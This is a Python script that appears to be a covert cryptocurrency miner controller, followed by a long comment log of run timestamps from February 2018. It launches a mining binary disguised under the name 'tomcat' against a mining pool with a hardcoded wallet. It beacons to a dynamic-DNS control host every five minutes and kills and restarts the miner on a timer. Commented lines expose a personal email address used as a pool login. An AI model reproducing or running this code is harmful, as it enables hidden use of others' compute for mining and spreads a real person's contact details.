import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:03.881563
#2018-02-17 17:11:01.500016
#2018-02-17 18:59:01.512043
#2018-02-17 20:47:04.321626
#2018-02-17 22:34:01.523227
#2018-02-18 00:18:01.579141
#2018-02-18 02:09:05.279168
#2018-02-18 03:56:01.520982
#2018-02-18 05:44:06.467221
#2018-02-18 07:37:06.099733
#2018-02-18 09:24:06.270024
#2018-02-18 11:10:01.421733
#2018-02-18 12:57:05.147628
#2018-02-18 14:44:05.953694
#2018-02-18 16:32:03.673775
#2018-02-18 18:21:06.324645
#2018-02-18 20:06:05.119773
#2018-02-18 21:53:01.506485
#2018-02-18 23:42:06.143156
#2018-02-19 01:28:05.820938
#2018-02-19 03:17:04.992320
#2018-02-19 05:02:06.239842
#2018-02-19 06:48:06.658702
#2018-02-19 08:37:07.721535
#2018-02-19 10:26:08.057364
#2018-02-19 13:19:10.095704
#2018-02-19 15:06:09.779658
#2018-02-19 16:55:06.748332
#2018-02-19 18:43:06.294157
#2018-02-19 20:33:07.715544
#2018-02-19 22:19:07.484573
#2018-02-20 00:06:08.171417
#2018-02-20 01:54:04.193821
#2018-02-20 03:42:02.671054
#2018-02-20 05:29:06.159110
#2018-02-20 07:13:07.438978
#2018-02-20 08:59:07.821581
#2018-02-20 10:43:02.123559
#2018-02-20 12:29:05.162315
#2018-02-20 14:16:07.248675
#2018-02-20 16:00:01.731221
#2018-02-20 17:46:04.472556
#2018-02-20 19:38:01.435788
#2018-02-20 21:23:01.611210
#2018-02-20 23:07:03.968012
#2018-02-21 00:51:02.200495
#2018-02-21 02:36:01.810711
#2018-02-21 04:25:07.388744
#2018-02-21 06:14:09.815098
#2018-02-21 08:00:11.470076
#2018-02-21 09:47:07.570158
#2018-02-21 11:36:08.804740
#2018-02-21 13:26:01.732388
#2018-02-21 15:11:04.078689
#2018-02-21 17:01:04.124476
#2018-02-21 18:49:09.688996
#2018-02-21 20:32:06.469473
#2018-02-21 22:17:07.731074
#2018-02-22 00:06:08.692491
#2018-02-22 01:53:05.995746
#2018-02-22 03:40:04.371281
#2018-02-22 05:26:06.967078
#2018-02-22 07:11:05.134224
#2018-02-22 08:57:06.999108
#2018-02-22 10:44:09.090620
#2018-02-22 12:32:07.162168
#2018-02-22 14:17:08.311086
#2018-02-22 16:05:04.943163
#2018-02-22 17:50:14.254974
#2018-02-22 19:38:03.902932
#2018-02-22 21:29:01.720291
#2018-02-22 23:15:02.752836
#2018-02-23 01:01:01.625286
#2018-02-23 02:48:07.404401
#2018-02-23 04:36:03.937240
#2018-02-23 06:22:04.861420
#2018-02-23 08:08:07.962274
#2018-02-23 10:24:04.429932
#2018-02-23 12:18:01.519579
#2018-02-23 14:07:06.109178
#2018-02-23 15:58:06.696873
#2018-02-23 17:43:02.039598
#2018-02-23 19:31:07.062950
#2018-02-23 21:14:07.427901
#2018-02-23 23:01:05.280784
#2018-02-24 00:49:05.288656
#2018-02-24 02:33:07.062526
#2018-02-24 04:26:03.312041
#2018-02-24 06:11:02.111169
#2018-02-24 07:58:06.503616
#2018-02-24 09:43:07.501530
#2018-02-24 11:39:02.145252
#2018-02-24 13:29:06.439679
#2018-02-24 15:17:07.707166
#2018-02-24 17:07:01.897264
#2018-02-24 18:59:04.117211
#2018-02-24 20:46:07.840386
#2018-02-24 23:02:01.215998
#2018-02-25 02:19:04.696968
#2018-02-25 05:36:06.418441
#2018-02-25 11:35:01.754792